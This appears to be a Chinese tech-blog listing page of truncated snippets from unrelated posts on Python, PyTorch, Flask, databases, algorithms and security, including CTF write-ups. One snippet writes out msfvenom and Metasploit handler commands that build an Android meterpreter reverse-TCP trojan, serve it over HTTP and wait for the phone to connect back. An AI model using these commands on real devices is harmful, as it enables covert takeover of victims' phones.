Python
Python 文件发送到对方服务器文件夹内
为了将Python文件发送到服务器的文件夹内,你可以使用paramiko库来实现SSH连接,并进行文件传输。以下是一个简单的例子: 首先,安装paramiko库(如果你还没有安装的话): 然后,使用以下Python代码将文件发送到远程服务器: 确保替换上述代码中的hostname、username、pa
企业目标资产信息收集
0x01 渗透测试中的目标资产信息收集 1 目标单位清单信息收集 1.1 通用搜索引擎查询 搜索企业关键字。如果搜索引擎支持语法查询,可以使用语法快速过滤结果(参考google hacking)。 得到的结果往往不全,需要结合其他方式进行扩展与补充。 1.2 网络安全搜索引擎 使用网络安全搜索引擎的语法查询过滤出目标单位相关的资产。不同的网络安全搜索引擎有不同的侧重点。前4种对国内覆盖比较全,最后
以pytorch的forward hook为例探究hook机制
在看pytorch的nn.Module部分的源码的时候,看到了一堆"钩子",也就是hook,然后去研究了一下这是啥玩意。 基本概念 在深度学习中,hook 是一种可以在模型的不同阶段插入自定义代码的机制。通过自定义数据在通过模型的特定层的额外行为,可以用来监控状态,协助调试,获得中间结果。 以前向hook为例 前向hook是模型在forward过程中会调用的hook,通过torch.nn.Modu
自学成为黑客的五本好书
自学成为黑客的五本好书 黑客入门 这是一个非常适合初学者的书籍,就算你毫无根基你也能用它来打开黑客世界的大门 Kali Linux 高级渗透测试 不会用kali 和 Linux的黑客 都是假黑客 学完它就可以秒杀所有的脚本小子 计算机网络:自顶向下的方法 你想在网络里当个隐形人 怎么能不了解计算机网络呢 Python 编程从入门到实践 这是业内推荐的python的经典
Termux 使用笔记
第一次安装完成后 发现这里面啥都没有 所以 更新源 apt update 也做不到 这是因为 源是国外 由于有墙 所以连接不上 下面这个命令可以 切换更新源 切换源之后 安装ssh 服务 然后修改密码 并启动 ssh 服务 就可以使用其他 设备链接 手机了 启动服务之后就可以使用 shell 连接工具进行连接了 当然也可以使用 命令进行连接 安装各种工具软件 这个时候就可以进行安装
MSF 入侵安卓手机
生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.135.247 LPPRT=5555 进行文件传输: python3 -m http.server 启动 MSF 控制端 : msconsole 设置模块: use exploit/multi/handler 设置payload: set payload androi
INFS3208 – Cloud Computing Programming
School of Information Technology and Electrical Engineering INFS3208 – Cloud Computing Programming Assignment Task III (10 Marks) Task description: In this assignment, you are asked to write a piece
zabbix“专家坐诊”第258期问答
问题一 Q:各位大神 问下这个zabbix通知到企业微信的py脚本可以使吗? A: 这个需要自行测试。 Q:用jconsole连接失败了。 A:那就是没配好, 连接不上,要确保能正常远程连接。 问题二 Q:这种是虚拟机内部的jmx配置有问题吗? A:提示被拒绝了,没成功连上,jmx 的要用先测试连接在监控。 问题三 Q:大佬,告警红色字体
23_合并K个升序链表
23_合并K个升序链表 【问题描述】 给你一个链表数组,每个链表都已经按升序排列。请你将所有链表合并到一个升序链表中,返回合并后的链表。 【算法设计思想】 使用优先队列(最小堆) 设计思想: 初始化优先队列:创建一个最小堆(优先队列),将每个链表的第一个节点加入堆中。这里堆中存储的是节点的值以及指向该节点的引用,以便于后续操作。 构建结果链表:创建一个虚拟头节点(dummy node),用于简化
如何自己动手实现一个图片解答小助手
有一张图片如下所示: Kimi上有一个功能,就是解析图片内容,给出回答: 这样可以用于拍照向AI提问的场景,我自己也有这方面的需求,因此动手实践了一下。 自己动手实现的效果如下所示: 那么自己如何实现呢? 可以通过添加一个OCR的功能来实现。中文图片文字识别也就是OCR效果比较好的是百度开源的PaddleOCR,之前介绍过PaddleOCR的.NET绑定PaddleSharp,见这篇文章:C
Hacker必备技能
Hacker黑客,业内嗤之以鼻,圈外遥不可及,同行付之一笑,我看来只要你不是做底层、人工智能与机器学习、计算机图形学、算法数据结构、信号处理、密码学、数据科学与大数据分析、游戏开发,触及到高数,想成为中级黑客不是什么难题,前提是兴趣,大部分人都是浅尝辄止,在看到枯燥的基础理论就不了了之了(我就是)。为了让兴趣不被懒惰耗尽,为了不是过眼云烟的泛读,在此记录Hacker必备技能 虽然Hacker通常不
PatriotCTF2024 Web Impersonate
源码: 定位到/admin这几行: 需要伪造session,uuid.uuid5(secret, 'administrator')恒为True,不用管,找到key: key是服务器启动时间,在/status下会展示已启动时间和服务器目前时间: 所以通过计算key就能伪造session,exp:
flask_sqlalchemy 分页
database.py from flask_sqlalchemy import SQLAlchemy db = SQLAlchemy() config.py import os from database import db from flask import Flask basedir=os.path.abspath(os.path.dirname(__name__)) app
python静默活体检测接口集成-人脸识别API-人脸认证
静默活体检测是一种不需要用户主动配合(如眨眼、点头等)的活体检测技术,通常通过摄像头采集用户的人脸图像,结合计算机视觉与AI算法来判断用户是否为真人。这项技术被广泛应用于身份验证、金融交易安全、智能门禁等领域。 确定接口供应商和接口规范 在集成静默活体检测功能之前,首先需要选择合适的服务提供商(如翔云、百度等),并获取其提供的API文档。常见的活体检测接口主要提供以下功能: 实时采
新电脑 Windows 系统初始配置
目录前言1 前置配置2 安装软件2.1 通讯工具2.2 后端开发工具2.3 硬件开发工具2.4 前端开发工具2.4 其它工具3 Windows 11 优化4 写在最后 前言 分区(个人习惯):1TB SSD 分为 2 个分区,一个 256GB 分区为系统盘,剩下的为一个分区。 之所以使用 256GB 为系统盘,是因为除开 30GB+ 的原生系统空间外,诸如 JetBrains 的下载缓存,Ma
python网络设备信息采集和正则表达式regex匹配
import paramiko import telnetlib import time import re import pandas as pd import matplotlib.pyplot as plt def get_via_ssh(hostname, username, password, command): # 创建SSH客户端 # 自动添加主机密钥 #
python 输出重定向
python 输出重定向 https://python3-cookbook.readthedocs.io/zh-cn/latest/c14/p01_testing_output_sent_to_stdout.html
高产胜那啥,带你上线我的新项目!
大家好,我是程序员鱼皮。9月,我处于极度爆肝状态,成功完结了最新带大家做的项目 面试刷题平台 。 当我们做完一个项目后,一定要记得把项目上线,这样才算是完成了学习的 “闭环”,写到简历上也才有竞争力。 我不仅将这个项目的代码开源给大家,还专门录制了一期 保姆级 部署上线的视频教程,供大家自学,没有上线过项目的朋友一定要看一看哦! 代码开源:https://github.com/liyupi/m
[1068] Find records with duplicate values in the specific column
To find records with duplicate values in the column “A” of a Pandas DataFrame, you can use the duplicated() method. Here’s how you can do it: Example import pandas as pd # Sample DataFrame df = pd
SHCTF2024-week1-crypto&其他
写密码+其他的稍微看看 Week1 Crypto d_known (e*d=1+k(p-1)*(q-1)) 我们知道p和q相近,且知道p和q的位数,也可以计算出(k(p-1)(q-1)) 我们就可以爆破kphi,然后直接开根,在一个小范围里找出flag baby_mod 我们知道(leak=p*r-q*t-tmp) tmp的值在15位bit,范围较小我们可以爆破,这里不考虑,记(leak
如何用 Python 手撸一个 GitLab 代码安全审计工具?
本文分享了极狐GitLab 的代码安全审计 & 审计事件流功能,而且演示如何用 Python 编写一个安全审计流接收器,通过接收安全审计日志并分析后发出通知。 极狐GitLab 为 GitLab 中文发行版,中文版本对中国用户更友好,可以一键私有化部署,也可以直接使用 SaaS(JihuLab.com)。本文讲述的安全审计 & 审计事件流属于专业版 & 旗舰版功能。可以申请
网站连接数据库怎么写
网站连接数据库的过程涉及多个步骤,包括配置数据库连接、编写数据库访问逻辑以及处理用户请求。下面以一个简单的示例来说明如何使用 Python 和 Flask 框架连接 MySQL 数据库,并实现用户登录功能。 准备工作 安装必要的库: pip install flask mysql-connector-python 创建数据库表: 在 MySQL 中创建一个用户表: CRE
如何修改模板上面内容的字体
要修改模板上内容的字体,通常可以通过以下几种方式来实现: 使用CSS样式 如果模板是基于HTML/CSS编写的,可以直接在CSS文件中或通过内联样式修改字体。 示例代码: body { font-family: 'Arial', sans-serif; } Word或PDF模板 对于Microsoft Word文档,可以在“开始”选项卡下的“字体”下拉菜单中选择
网站连接数据库配置怎么设置
网站连接数据库的配置通常涉及以下几个步骤: 选择数据库类型: 确定你的网站将使用哪种类型的数据库,例如 MySQL, PostgreSQL, MongoDB 等。 安装数据库驱动: 根据所选数据库类型,在你的开发环境中安装相应的数据库驱动或客户端库。例如,对于 MySQL,可以使用 mysql-connector-python 作为 Python 的驱动。 配置数据
写网站怎么连接数据库
连接网站到数据库通常涉及以下几个步骤: 选择合适的数据库类型:根据你的应用需求选择一个适合的数据库类型,如关系型数据库(MySQL, PostgreSQL)或非关系型数据库(MongoDB, Redis)。 安装必要的驱动程序:为了让你的应用能够与数据库通信,你需要安装相应的数据库驱动程序。例如,如果你使用的是Python和MySQL,你可以安装mysql-connector-python
网站设计怎么连接数据库
网站设计中连接数据库通常涉及以下几个步骤: 选择数据库类型: 根据应用需求选择合适的数据库类型,如关系型数据库(MySQL, PostgreSQL)或非关系型数据库(MongoDB, Redis)。 配置数据库: 在服务器上安装并配置所选数据库系统。 创建数据库实例,并设置必要的用户权限。 编写数据库连接代码: 使用编程语言提供的库或框架来编写连接数据库的代码。例如,在Pyt
ftp上直接修改文件内容
在FTP (File Transfer Protocol) 上直接修改文件内容并不是一个推荐的做法,因为FTP本身主要用于文件传输,并不支持直接编辑文件内容。如果你需要修改远程服务器上的文件内容,通常有以下几种方法: 下载-修改-上传 将文件从FTP服务器下载到本地。 在本地进行所需的修改。 将修改后的文件重新上传到FTP服务器,覆盖原来的文件。 使用SFTP或SCP 如果你的FTP
Day2 备战CCF-CSP练习
Day2 题目描述 请你写一个命令行分析程序,用以分析给定的命令行里包含哪些选项。 每个命令行由若干个字符串组成,它们之间恰好由一个空格分隔。 这些字符串中的第一个为该命令行工具的名字,由小写字母组成,你的程序不用对它进行处理。 在工具名字之后可能会包含若干选项,然后可能会包含一些不是选项的参数。 选项有两类:带参数的选项和不带参数的选项。 一个合法的无参数选项的形式是一个减号后面跟单个小写字母,